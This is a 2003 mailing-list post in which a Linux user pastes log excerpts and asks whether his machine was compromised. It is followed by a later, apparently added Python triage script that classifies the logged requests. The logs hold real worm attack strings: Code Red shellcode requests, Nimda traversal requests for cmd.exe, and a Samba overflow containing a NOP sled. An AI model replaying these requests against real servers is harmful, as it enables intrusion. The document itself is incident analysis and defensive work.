Thanks for all the replies.
This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string overflow caused some problems from April 21 to 29 - scroll down to see the logs. Does this mean that a hacker has gotten control of my box?
In a number of replies people talk about a cracker; eh, what is a cracker? And what is the difference from a hacker?
From: "Derek Fountain"
> Do you have any reason to believe a hardware fault has occurred? Any history of
> overheating with that box? Has it received a knock recently which might have
> dislodged some memory? Any reason to think the hard disk might have started
> to die?
I have no reason whatsoever to suspect a hardware problem. No knocks, overheating etc.
> A reinstall looks like the best option in the absence of any better advice. My
> suspicions would lie with the hardware though. Happily running Linux boxes
> don't just go belly up like that without a good reason.
I think that I will reinstall the machine.
Rohit writes:
> I would have looked at /var/log/ directory and in relevant files there.
Thanks for this, would you suggest which file I should look at?
I looked at my mail log and guess what?
There is a huge hole in the log; everything from April 21 to 29 is gone.
Mail was running during that time.
Apparently deleted (???). Here is a snip of the log:
[snip]
Apr 21 18:00:34 linux sendmail[6307]: h3LG0Yd3006306: to=<root(a)linux.local>, ctladdr=<root(a)linux.local> (0/0), delay=00:00:00, xdelay=00:00:00, mailer=local, pri=31120, dsn=2.0.0, stat=Sent
Apr 29 09:50:09 linux sendmail-client[1040]: starting daemon (8.12.3): queueing@00:30:00
[/snip]
No data seems to be missing from the apache access log on April 21 6pm - but there seems to be some kind of hacking attempt at that time.
Here is a snip of that log:
[snip]
80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
208.25.133.10 - - [21/Apr/2003:17:43:13 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:55 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:02 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
193.109.122.5 - - [21/Apr/2003:18:51:24 +0200] "CONNECT 193.109.122.7:2048/ HTTP/1.1" 400 340
80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:21 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.201.159.40 - - [21/Apr/2003:21:52:29 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" 401 477
[/snip]
Here is a snip from the samba log file (log.smbd).
I don't understand all of this, but there was activity on April 21 around 18:00.
I don't recognise these IP addresses.
[snip]
[2003/04/21 18:04:16, 0] smbd/service.c:make_connection(249)
localhost (200.67.132.3) couldn't find service c
[2003/04/21 18:04:30, 0] smbd/service.c:make_connection(249)
localhost (80.24.226.55) couldn't find service c
[2003/04/21 18:18:39, 0] smbd/service.c:make_connection(249)
alevrius_ (200.56.254.70) couldn't find service c
[2003/04/21 18:20:24, 0] smbd/service.c:make_connection(249)
50163099sp (67.225.191.11) couldn't find service c
[2003/04/21 18:29:04, 0] smbd/service.c:make_connection(249)
50163099sp (62.56.130.23) couldn't find service c
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6353 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6354 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6355 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6356 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6360 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6371 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:52:16, 0] smbd/service.c:make_connection(249)
localhost (61.217.123.231) couldn't find service c
[/snip]
More log reading, this time messages - this log shuts down April 21 and starts up April 29 - a samba string overflow seems to have caused a shutdown.
[snip]
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
Apr 21 18:44:20 linux smbd[6373]: INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Apr 21 18:44:20 linux smbd[6373]: Please read the file BUGS.txt in the distribution
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
Apr 21 18:44:20 linux smbd[6373]: PANIC: internal error
Apr 21 18:44:20 linux smbd[6373]:
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 29 09:46:25 linux syslogd 1.3-0: restart.
Apr 29 09:46:36 linux sshd[844]: Server listening on :: port 22.
Apr 29 09:46:37 linux webmin[843]: Webmin starting
Apr 29 09:46:44 linux /etc/hotplug/net.agent[846]: No HW description found ... exiting
Apr 29 09:50:08 linux init: Switching to runlevel: 6
Apr 29 09:50:09 linux /usr/sbin/cron[1029]: (CRON) STARTUP (fork ok)
Apr 29 09:52:30 linux syslogd 1.3-0: restart.
Apr 29 09:52:41 linux sshd[843]: Server listening on :: port 22.
Apr 29 09:52:43 linux webmin[842]: Webmin starting
[/snip]
Thanks in advance for any advice.
Dan
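As a worked example added here (not part of Dan's post or any reply in the thread), a small triage script run over constructed sample lines shaped like the ones quoted above: it tags the Code Red style default.ida requests and the Nimda style cmd.exe/root.exe traversal requests (IIS worm traffic that an Apache box can only answer with 4xx, so those attempts did not succeed), finds the multi-day hole in the messages log, and flags a safe_strcpy overflow whose logged bytes are all octal 220 (0x90, the x86 NOP byte), which is the entry that actually merits attention. The worm labels, thresholds and sample values are my assumptions.

```python
import re
from datetime import datetime
# Constructed sample lines, modelled on the entries quoted in the post (not the full logs).
ACCESS_LOG = """\
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET /default.ida?XXXXXXXX%u9090%u6858 HTTP/1.0" 404 629
80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" 401 477
"""
MESSAGES_LOG = r"""Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220]
Apr 29 09:46:25 linux syslogd 1.3-0: restart.
Apr 29 09:46:36 linux sshd[844]: Server listening on :: port 22.
"""

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3})')
# Request shapes of the IIS worms quoted in the post; Apache has no such files, hence the 404s.
WORM_SIGS = {"codered": re.compile(r"/default\.ida\?X+"),
             "nimda": re.compile(r"(root|cmd)\.exe\?/c\+", re.I)}
SYSLOG_TS = re.compile(r"^([A-Z][a-z]{2}) +(\d{1,2}) (\d\d:\d\d:\d\d) ")
OVERFLOW_RE = re.compile(r"smbd\[(\d+)\]: ERROR: string overflow by (\d+) in safe_strcpy \[(.*)\]")

def classify_access(text):
    """(ip, worm_label, status) for every access-log request matching a worm signature."""
    hits = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        for label, sig in WORM_SIGS.items():
            if m and sig.search(m["req"]):
                hits.append((m["ip"], label, int(m["status"])))
                break
    return hits

def syslog_gaps(text, year, max_gap_hours=24.0):
    """(prev_line, next_line, hours) wherever consecutive syslog entries are more than max_gap_hours apart."""
    gaps, prev = [], None
    for line in text.splitlines():
        m = SYSLOG_TS.match(line)
        if not m:
            continue  # continuation or malformed line: keep the last good timestamp
        ts = datetime.strptime(f"{m[1]} {m[2]} {year} {m[3]}", "%b %d %Y %H:%M:%S")
        if prev and (hours := (ts - prev[0]).total_seconds() / 3600) > max_gap_hours:
            gaps.append((prev[1], line, hours))
        prev = (ts, line)
    return gaps

def samba_overflows(text):
    """(pid, overflow_bytes, all_nop) per safe_strcpy line; octal 220 is 0x90, the x86 NOP byte."""
    return [(int(m[1]), int(m[2]), bool(m[3]) and m[3].count(r"\220") * 4 == len(m[3]))
            for m in OVERFLOW_RE.finditer(text)]
```

Running the three functions over the real /var/log/messages and the Apache access log (pass the year of the log, since syslog lines carry none) gives the same three answers the post is reaching for: the worm hits are noise, the hole is real, and the samba crash carried a NOP-filled string.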